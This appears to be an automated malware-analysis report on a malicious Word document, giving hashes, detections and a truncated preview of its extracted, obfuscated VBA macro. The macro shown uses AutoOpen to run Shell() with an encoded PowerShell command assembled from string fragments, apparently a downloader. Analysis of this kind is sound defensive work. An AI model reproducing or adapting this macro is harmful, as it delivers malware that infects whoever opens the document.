Office (OLE) malware analysis — malicious · 0c1ae01e56a02531

MALICIOUS

Office (OLE)

98.2 KB Created: 2018-06-07 17:17:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: b8b82a6cd8f534515c761cafd7bd7728 SHA-1: ca643927a0134247c57b5de6cf523e2a127c3c1d SHA-256: 0c1ae01e56a025315598deedc0cfbc1b7e027aad7dc6a0ee0bdf70babc9785c8

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a legacy WordBasic Autoopen macro that triggers a VBA macro. This VBA macro, in turn, calls the Shell() function to execute a PowerShell command. The PowerShell command appears to be obfuscated but likely downloads and executes a second-stage payload. The presence of Autoopen and Shell() calls strongly suggests malicious intent.

Heuristics 7

ClamAV: Doc.Malware.Donoff-7167241-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Donoff-7167241-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12056 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12056 bytes
SHA-256: `c8a0b3c249e4160b52daa22d3d1178578ee3c7a24fafed1101a7df7f5b819684`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zdXXRhCd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function FAUzvR() On Error Resume Next SuPRpq = Tan(jfGWO _ * Tan(KFtQio * Int(csbikw * Sqr(86260) / SvEzE + Fix(16101)) / 90508 * Round(36198 / Log(45795 - GCjtf) + 70604 - HwIGN)) _ / 84069 + Log(30248)) XNZShh = Tan(zsRjCY _ * Tan(RPmVw * Int(lFiMqL * Sqr(54774) / kFEEo + Fix(16015)) / 63885 * Round(90930 / Log(41764 - pmPFn) + 54325 - hwwisT)) _ / 85007 + Log(90752)) FAUzvR = PHSXiDUsMkM + Shell(haiJnhoDMq + Chr(FcjBqHXHoY + vbKeyP + SDUWC) + MIqCuXCZPMl + SOznt + jwLRXE + fYVBulzEj + vvBrLIIG + OUiTL, 19077 - 19077) DRiMbW = Tan(pMnMf _ * Tan(PcWum * Int(JMjRGQ * Sqr(16805) / iWrlM + Fix(17312)) / 1017 * Round(9171 / Log(29636 - JYThZ) + 85964 - PQTiW)) _ / 15411 + Log(97279)) End Function Sub Autoopen() On Error Resume Next MlbXzY = Tan(TIaSUB _ * Tan(WNLMF * Int(NMbnnR * Sqr(82962) / pfHOt + Fix(7031)) / 99346 * Round(45454 / Log(49010 - PsNFLH) + 12781 - zOuFW)) _ / 18055 + Log(4227)) FAUzvR UAJnj = Tan(jvddSE _ * Tan(zBwodz * Int(WIAUj * Sqr(30388) / cGjIw + Fix(24101)) / 60433 * Round(67981 / Log(98557 - lwjLS) + 52638 - oCwBNv)) _ / 33389 + Log(87315)) End Sub Attribute VB_Name = "prMzoHTQ" Function MIqCuXCZPMl() On Error Resume Next itjbU = Tan(LXDPt _ * Tan(bAutk * Int(UVbFE * Sqr(34945) / LbwBw + Fix(52250)) / 33980 * Round(14141 / Log(30193 - BsKnzo) + 18140 - MwEUB)) _ / 62906 + Log(85779)) hkQjlQksDWj = "owersHeLL" + " -e K" + "AB" + "uAEU" + "AVwAtAG8AYgB" + "KA" bTHldo = Tan(XItOW _ * Tan(ocwLF * Int(BaRUhS * Sqr(647) / VzqaQI + Fix(41493)) / 99037 * Round(96681 / Log(99269 - RNiniF) + 49119 - zYUIJv)) _ / 77118 + Log(82442)) RkBzpCCBanv = "EUA" + "Yw" + "BUACAA" + "IABTAFkA" + "cw" + "BUAGUAbQAuAGkAb" + "wAuAH" KwaSd = Tan(sXRTwO _ * Tan(odwhnf * Int(nmOHf * Sqr(5216) / Brhic + Fix(33730)) / 40959 * Round(78769 / Log(99419 - LoRlP) + 24544 - aYLjqL)) _ / 53730 + Log(15315)) nijzhjL = "MAVAByAGUAQQBNA" + "HIAZQBBAE" + "QARQB" + "SAC" + "gAKABuAEUAV" TNXjS = Tan(acrjko _ * Tan(wQziX * Int(zNlXZ * Sqr(54135) / HqkKjF + Fix(43292)) / 36961 * Round(96461 / Log(15766 - QHXOp) + 89361 - cwEbvk)) _ / 23446 + Log(76756)) jibPnfKvd = "wAtAG8AYgBKAE" + "UAYwBUACA" + "AIABTAHkAUwB0A" + "EUATQAuAGkA" + "TwAu" + "AGMAbwBNAFAAc" Ivhpz = Tan(ljjrj _ * Tan(iSDwI * Int(OQwlYr * Sqr(78640) / icfvAw + Fix(84853)) / 99782 * Round(26976 / Log(46067 - STIWr) + 58770 - NiwfBd)) _ / 74881 + Log(2864)) kqcBsjJc = "gBFAHMAUwBJAE" + "8AbgAuA" + "GQARQBmAGwA" + "QQB0AG" + "UA" + "UwBUAFIAR" + "QBhAG0AKAB" + "bAGkA" XHXXqA = Tan(dIAnr _ * Tan(IiEfip * Int(FuGGa * Sqr(56699) / wwbCI + Fix(97290)) / 886 * Round(39205 / Log(85142 - AZSSfN) + 83173 - FfaTbW)) _ / 90870 + Log(95240)) QFUnktp = "TwAuA" + "G0AZQ" + "BN" + "AG8AcgB5AH" + "MAdAByAGUAY" + "QBtAF" + "0A" + "WwBDAE8AbgBW" + "AGUAcgBUAF0AOgA" sdBQwN = Tan(Bfhwft _ * Tan(nmNiIW * Int(ajPQUw * Sqr(61617) / WFGLMI + Fix(82294)) / 82521 * Round(51400 / Log(8393 - YQzfs) + 22173 - zmhOr)) _ / 75234 + Log(51252)) VOLamOvdAhX = "6AEYAUgBP" + "AG0AYgBBA" + "FMARQA2" + "ADQAUwBUAFIAS" + "QBOAGcAKAAn" + "AFYAVgBCAHIAVAA" + "4AEo" + "AQQBFAFAAd" RwmAbO = Tan(WJcrT _ * Tan(Zzvmav * Int(jaBWEI * Sqr(1094) / zHNTkX + Fix(81829)) / 88511 * Round(8751 / Log(51276 - zKtqDA) + 83733 - XpmcRr)) _ / 54361 + Log(15430)) sWjqfINrIPL = "wByADkA" + "NgBGAEoASQBjAEo" + "AZABmAEE" + "AdQBOAGkAUQ" + "A4AGUAeABo" + "AGMATgBKAFUAR" + "wBOAGkAYgBsAG" vPvTOU = Tan(BPYjI _ * Tan(DqLzzn * Int(kzVNbc * Sqr(8209) / fvbIP + Fix(99808)) / 96795 * Round(78115 / Log(60060 - jqVoo) + 54476 - XomvQ)) _ / 38924 + Log(89831)) ZCouziOcRa = "UAV" + "gAzA" + "HYAUQAz" + "AHQAVw" + "A3AHAA" MIqCuXCZPMl = hkQjlQksDWj + RkBzpCCBanv + nijzhjL + jibPnfKvd + kqcBsjJc + QFUnktp + VOLamOvdAhX + sWjqfINrIPL + ZCouziOcRa End Function Function SOznt() On Error Resume Next VGzuir = Tan(QN ... (truncated)

SHA-256: c8a0b3c249e4160b52daa22d3d1178578ee3c7a24fafed1101a7df7f5b819684

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zdXXRhCd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FAUzvR()
On Error Resume Next
SuPRpq = Tan(jfGWO _
* Tan(KFtQio * Int(csbikw * Sqr(86260) / SvEzE + Fix(16101)) / 90508 * Round(36198 / Log(45795 - GCjtf) + 70604 - HwIGN)) _
/ 84069 + Log(30248))
XNZShh = Tan(zsRjCY _
* Tan(RPmVw * Int(lFiMqL * Sqr(54774) / kFEEo + Fix(16015)) / 63885 * Round(90930 / Log(41764 - pmPFn) + 54325 - hwwisT)) _
/ 85007 + Log(90752))
FAUzvR = PHSXiDUsMkM + Shell(haiJnhoDMq + Chr(FcjBqHXHoY + vbKeyP + SDUWC) + MIqCuXCZPMl + SOznt + jwLRXE + fYVBulzEj + vvBrLIIG + OUiTL, 19077 - 19077)
DRiMbW = Tan(pMnMf _
* Tan(PcWum * Int(JMjRGQ * Sqr(16805) / iWrlM + Fix(17312)) / 1017 * Round(9171 / Log(29636 - JYThZ) + 85964 - PQTiW)) _
/ 15411 + Log(97279))
End Function
Sub Autoopen()
On Error Resume Next
MlbXzY = Tan(TIaSUB _
* Tan(WNLMF * Int(NMbnnR * Sqr(82962) / pfHOt + Fix(7031)) / 99346 * Round(45454 / Log(49010 - PsNFLH) + 12781 - zOuFW)) _
/ 18055 + Log(4227))
FAUzvR
UAJnj = Tan(jvddSE _
* Tan(zBwodz * Int(WIAUj * Sqr(30388) / cGjIw + Fix(24101)) / 60433 * Round(67981 / Log(98557 - lwjLS) + 52638 - oCwBNv)) _
/ 33389 + Log(87315))
End Sub



Attribute VB_Name = "prMzoHTQ"
Function MIqCuXCZPMl()
On Error Resume Next
itjbU = Tan(LXDPt _
* Tan(bAutk * Int(UVbFE * Sqr(34945) / LbwBw + Fix(52250)) / 33980 * Round(14141 / Log(30193 - BsKnzo) + 18140 - MwEUB)) _
/ 62906 + Log(85779))
hkQjlQksDWj = "owersHeLL" + " -e K" + "AB" + "uAEU" + "AVwAtAG8AYgB" + "KA"
bTHldo = Tan(XItOW _
* Tan(ocwLF * Int(BaRUhS * Sqr(647) / VzqaQI + Fix(41493)) / 99037 * Round(96681 / Log(99269 - RNiniF) + 49119 - zYUIJv)) _
/ 77118 + Log(82442))
RkBzpCCBanv = "EUA" + "Yw" + "BUACAA" + "IABTAFkA" + "cw" + "BUAGUAbQAuAGkAb" + "wAuAH"
KwaSd = Tan(sXRTwO _
* Tan(odwhnf * Int(nmOHf * Sqr(5216) / Brhic + Fix(33730)) / 40959 * Round(78769 / Log(99419 - LoRlP) + 24544 - aYLjqL)) _
/ 53730 + Log(15315))
nijzhjL = "MAVAByAGUAQQBNA" + "HIAZQBBAE" + "QARQB" + "SAC" + "gAKABuAEUAV"
TNXjS = Tan(acrjko _
* Tan(wQziX * Int(zNlXZ * Sqr(54135) / HqkKjF + Fix(43292)) / 36961 * Round(96461 / Log(15766 - QHXOp) + 89361 - cwEbvk)) _
/ 23446 + Log(76756))
jibPnfKvd = "wAtAG8AYgBKAE" + "UAYwBUACA" + "AIABTAHkAUwB0A" + "EUATQAuAGkA" + "TwAu" + "AGMAbwBNAFAAc"
Ivhpz = Tan(ljjrj _
* Tan(iSDwI * Int(OQwlYr * Sqr(78640) / icfvAw + Fix(84853)) / 99782 * Round(26976 / Log(46067 - STIWr) + 58770 - NiwfBd)) _
/ 74881 + Log(2864))
kqcBsjJc = "gBFAHMAUwBJAE" + "8AbgAuA" + "GQARQBmAGwA" + "QQB0AG" + "UA" + "UwBUAFIAR" + "QBhAG0AKAB" + "bAGkA"
XHXXqA = Tan(dIAnr _
* Tan(IiEfip * Int(FuGGa * Sqr(56699) / wwbCI + Fix(97290)) / 886 * Round(39205 / Log(85142 - AZSSfN) + 83173 - FfaTbW)) _
/ 90870 + Log(95240))
QFUnktp = "TwAuA" + "G0AZQ" + "BN" + "AG8AcgB5AH" + "MAdAByAGUAY" + "QBtAF" + "0A" + "WwBDAE8AbgBW" + "AGUAcgBUAF0AOgA"
sdBQwN = Tan(Bfhwft _
* Tan(nmNiIW * Int(ajPQUw * Sqr(61617) / WFGLMI + Fix(82294)) / 82521 * Round(51400 / Log(8393 - YQzfs) + 22173 - zmhOr)) _
/ 75234 + Log(51252))
VOLamOvdAhX = "6AEYAUgBP" + "AG0AYgBBA" + "FMARQA2" + "ADQAUwBUAFIAS" + "QBOAGcAKAAn" + "AFYAVgBCAHIAVAA" + "4AEo" + "AQQBFAFAAd"
RwmAbO = Tan(WJcrT _
* Tan(Zzvmav * Int(jaBWEI * Sqr(1094) / zHNTkX + Fix(81829)) / 88511 * Round(8751 / Log(51276 - zKtqDA) + 83733 - XpmcRr)) _
/ 54361 + Log(15430))
sWjqfINrIPL = "wByADkA" + "NgBGAEoASQBjAEo" + "AZABmAEE" + "AdQBOAGkAUQ" + "A4AGUAeABo" + "AGMATgBKAFUAR" + "wBOAGkAYgBsAG"
vPvTOU = Tan(BPYjI _
* Tan(DqLzzn * Int(kzVNbc * Sqr(8209) / fvbIP + Fix(99808)) / 96795 * Round(78115 / Log(60060 - jqVoo) + 54476 - XomvQ)) _
/ 38924 + Log(89831))
ZCouziOcRa = "UAV" + "gAzA" + "HYAUQAz" + "AHQAVw" + "A3AHAA"
MIqCuXCZPMl = hkQjlQksDWj + RkBzpCCBanv + nijzhjL + jibPnfKvd + kqcBsjJc + QFUnktp + VOLamOvdAhX + sWjqfINrIPL + ZCouziOcRa
End Function
Function SOznt()
On Error Resume Next
VGzuir = Tan(QN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.